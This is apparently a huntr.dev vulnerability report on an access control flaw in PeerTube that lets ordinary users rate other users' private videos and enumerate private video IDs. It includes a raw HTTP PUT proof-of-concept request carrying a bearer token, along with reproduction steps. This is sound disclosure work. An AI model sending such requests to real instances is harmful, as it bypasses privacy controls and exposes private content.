huntr / nhiephon / D1FAA10F-0640-480C-BB52-089ADB351E6E
History: Feb 14, 2022 - 4:30 a.m.

Improper Access Control in chocobozzz/peertube

2022-02-14 04:30:21
nhiephon
www.huntr.dev

EPSS: 0.001 (Low), Percentile: 21.4%

Description

The app doesn't check the privacy status of a video before making data changes on it. As a result, normal users can rate (like or dislike) private videos that belong to other users.

Proof of Concept

Note: I'm using the instance p.lu for testing.

  • Step 1: Log in as user test1 and upload a private video. Note the video ID of the private video.
  • Step 2: Send the following request using the token of user test2:
PUT /api/v1/videos/53328/rate HTTP/2
Host: p.lu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer d8163b600e3de89c6039af034a94bd3898d68825
Content-Type: application/json
Content-Length: 17
Origin: https://p.lu
Referer: https://p.lu/w/87rzixn5tGiFBA5iojv9RP
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"rating":"like"}
  • Step 3: In the browser of user test1, the like count of the private video now shows 1.
  • PoC:

send_rating: https://drive.google.com/file/d/1kSSCkCZZEINBwlupH49hJa3b5xjzUCJs/view?usp=sharing

1 like and 1 dislike on a private video: https://drive.google.com/file/d/1OqfoJwTguSPDO0qElDSZKjzBqJXbwScW/view?usp=sharing

Impact

Attackers can send ratings for private videos they do not own. This can also be abused to enumerate the IDs of private videos, since the API response differs depending on whether a video with the guessed ID exists.

